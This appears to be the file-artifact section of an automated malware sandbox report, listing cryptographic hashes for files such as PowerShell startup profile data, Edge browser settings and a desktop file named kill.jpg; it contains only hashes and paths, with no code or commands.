MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a8e8360d573a4ff072dcc6f09d992c88
SHA1 3446774433ceaf0b400073914facab11b98b6807
SHA256 bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
SHA512 4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2a6340ea1eed3a2ba833f7165304abee
SHA1 13ed4f69c318ea9db9499418824a21468f4fba82
SHA256 7f8cca885fab79251f95b13b074c54b143ab30d2506322c5f708c823123cd652
SHA512 aafc37e434ed9cbcd1578964cdd8cba7d9bae4d1eccf8fc3f561f6c7f30265c8b60e3465a082cdea3ffcb987b20fca9726116965555b0843d3935f2c4f663ce2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb1ad317bd25b55b2bbdce8a28a74a94
SHA1 98a3978be4d10d62e7411946474579ee5bdc5ea6
SHA256 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512 d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cae60f0ddddac635da71bba775a2c5b4
SHA1 386f1a036af61345a7d303d45f5230e2df817477
SHA256 b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
SHA512 28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 da5c82b0e070047f7377042d08093ff4
SHA1 89d05987cd60828cca516c5c40c18935c35e8bd3
SHA256 77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA512 7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 499298c8da8c8b6e630c889b60905388
SHA1 b3b519bebf9861bcdad6e2e6426c2e8a96fd8056
SHA256 2e5392338aeb35e2d1ca8c95cde814389a76808da33de106e860c5659c6823ca
SHA512 9da91784102b7fcd981d9cd84e787b4609d6c55f359df1bc8bf27759233a8be461552c370f13a21dd953c3f1254b15fe33b6ab89745cb36e7b382934487eb069

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 07a771c4f31f62b2d04e2befaa36dce7
SHA1 662952ede6c1acbb575e8149a5ac2f08edade811
SHA256 a2df2570980e1123d9af8e12a27a82d3a4d332f0e7dd44e4e225743207c099b3
SHA512 9e339a2d0bfaf5bbe5252f69061652c5880fe1233930830ca7190a65516366e05129907b1656a6790c0093ad82ac73ddee6738d0b78ecb1e3d888f467b889fe9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2d06ce10e4e5b9e174b5ebbdad300fad
SHA1 bcc1c231e22238cef02ae25331320060ada2f131
SHA256 87d1dd56f12a88907ba5aebca8d555443d6f77ed214497277cc8bcd31c669f2c
SHA512 38cfbeb59605854ae4fcfae8619a6b26bd916148acfb5636383672a3960b45ca41fed5c241f97465129e92eaf78c4c85dcf258f1ab501a2bf771287ce04f76a7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb033be02578f9635ec47bdc1de5c3fb
SHA1 ec356bc87381354a06baa9c30e8c3ac3d30e0f6f
SHA256 bd827af3192bf83c75a32e51ed2de83bd3b90d6b99350721a189a57cec15d063
SHA512 4d8778503646f7016df73ff9d204760f4fe4d2b24157920ac3e5651653373975b2f2d229530143059f11b16c42822ad7963e628ad6066022ee712c17d90595ed

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 92075279f2dbcaa5724ee5a47e49712f
SHA1 8dd3e2faa8432dde978946ebaf9054f7c6e0b2cb
SHA256 fd985ddd090621af25aa77aebff689c95ea7679ff0e81887124b2802ae3e9442
SHA512 744c62556233d9872f43ffb5a5a98aee20a44834436306f0a948c8c4072bdb46ef8044616593747edd645caaee60faf8b14fedb2d6df5f6019b5c73357d80d22

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b4646fe52f593add056daf5fcd12e1fc
SHA1 5780e838d6d16b46d0adf67fa218912ad27eb255
SHA256 18e0db863ce8b8f5f1069f6f63432c3e555a6c4d277e60b10de381b49e3353b3
SHA512 66aef8db65a277d82fb20c36f6f237fe462ce935823c0605bf7cadfb529b1a78858d6e0db75d1d06d9a03f768183d6b9a7267433df4a5051b394e97df0ec9208

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8e0463bbef1b605dfc2a1087b2e77b80
SHA1 c89e7729bce75ca526bf070a8c414a12f0259d14
SHA256 1e007adcf73566ade781e1dd4aabea4ee8d7f9cb7a0ef97b5fa9c76521ee7e4b
SHA512 3d90cbcd32290917a1dc1ee9ddcc4a4bdb29366ee03b876a9f46a42192930bd4121bb9dad76608a463985d64f5e91844f8bcc61897d3f0109af6010f892aeacc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5211540f1ce84c453ade4a6db3c42bc3
SHA1 9e1a2016e914f8aec04c6f9ddcb1ae9532037c6e
SHA256 553c5262e82eeba67573d922ed66ab147ab563f60b2eedb8dc56ff7036217d78
SHA512 f21a8cd2f4dfa16cd093e53d116e8c11db79c55860621bebd9ed4b04f1e9015311def0514f966e3ebdc25c9638cb652588e71c11f4fd504f7d9341685b2ba1ed

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 35b2bf5a93c55d7db18eb1f2987b24d4
SHA1 2aa6e710638fbd3a60b28ecc67ab0f2a7be0f233
SHA256 fca5b1519448c291a0107b09c5d4306dbe22353f8ac1190e6d6b7d86a6e73a8d
SHA512 05a2695a18795b01dbc9318d32b5a733ccb75ac82ed7ef5dff300dd4f891d1e8be426398eec91e92f49b50a3e6e63fa46bd92a142fe93709958a242849ea7056

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 719fd150e78f630817910e72ad00fc16
SHA1 093ef625bd5e314e334cffda49458cde7b8a85aa
SHA256 17850f8bbb06ed6af4ba88f2c085dd1f3afa20f36f63dc20ad548c1ce61a9455
SHA512 cd8b52ddf31313f77f905b2203e55ec32e65cf2f47c828d3262b9fe2ec3cc2704d112ba3574be8967b704cb0c1fbc986665b40ab85b1ad129e5bc98354c8e175

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60945d1a2e48da37d4ce8d9c56b6845a
SHA1 83e80a6acbeb44b68b0da00b139471f428a9d6c1
SHA256 314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3
SHA512 5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0aa63dbb46d451e47a7a682c64af776d
SHA1 3b0026f2dae8e9c491ccaa40133755779de35aaa
SHA256 9158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b
SHA512 4d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10fb30dc297f99d6ebafa5fee8b24fa2
SHA1 76904509313a49a765edcde26b69c3a61f9fa225
SHA256 567bcacac120711fc04bf8e6c8cd0bff7b61e8ee0a6316254d1005ebb1264e6a
SHA512 c42ace1ea0923fa55592f4f486a508ea56997fdbe0200016b0fc16a33452fc28e4530129a315b3b3a5ede37a07097c13a0eb310c9e91e5d97bb7ce7b955b9498

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5663972c1caaba7088048911c758bf3
SHA1 3462dea0f9c2c16a9c3afdaef8bbb1f753c1c198
SHA256 9f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e
SHA512 ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e60eb305a7b2d9907488068b7065abd3
SHA1 1643dd7f915ac50c75bc01c53d68c5dafb9ce28d
SHA256 ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135
SHA512 95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 fc1be17d2d7f77a17257db5ffc10f652
SHA1 2c6538379e2496334bd41c99d66db38dd9697b72
SHA256 c00ab9d006676a17cd927d9358d7fbd0e5c013a8b9261c6b18b3771d3745f22c
SHA512 3790872f7abdebb29679507f105ff26b060a2ee9fc1b494c5dd433349c4101e73aaca4d583cf9c01d5b6492025a0ce617664dcf7921290acff7889f99b8f0867

C:\Users\Admin\Desktop\kill.jpg

MD5 3c902b79ca8053d80fe381cc8fa495a2
SHA1 3f38f9a5cd03a889887a3c32d9642a3dc83c3e5a
SHA256 d7c4b9f94a23b899435abf8ee25f2f767b19c1c7ca3a46b7de5e8253a5fd00b0
SHA512 8c8b068e001090c7480e0ac28ce883683f6ee5d764a8502154c2f658fc6001f82a8de965cbcf38a320af89412cafe8e6cb96b8ef6771ff7d06ecf521f227fc6e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cc19bcff372d20459d3651ba8aef50e7
SHA1 3c6f1d4cdd647864fb97a16b1aefba67fcee11f7
SHA256 366473e774d8976c7fd4dc582220666fb61a4feb3f7c95e69b2a68ad9e446ec9
SHA512 a0e360ca4b6e874fd44612bf4b17f3722c0619da4f6bade12a62efadae88c2d33460114eaafa2bc3fb1cef5bea07e745b8bee24f15d0cacaff5f4a521b225080

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aeceee3981c528bdc5e1c635b65d223d
SHA1 de9939ed37edca6772f5cdd29f6a973b36b7d31b
SHA256 b99f3c778a047e0348c92c16e0419fa29418d10d0fec61ad8283e92a094a2b32
SHA512 df48285f38e9284efdbd9f8d99e2e94a46fb5465953421ab88497b73ae06895b98ea5c98796560810a6f342c31a9112ea87e03cd3e267fd8518d7585f492a8fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221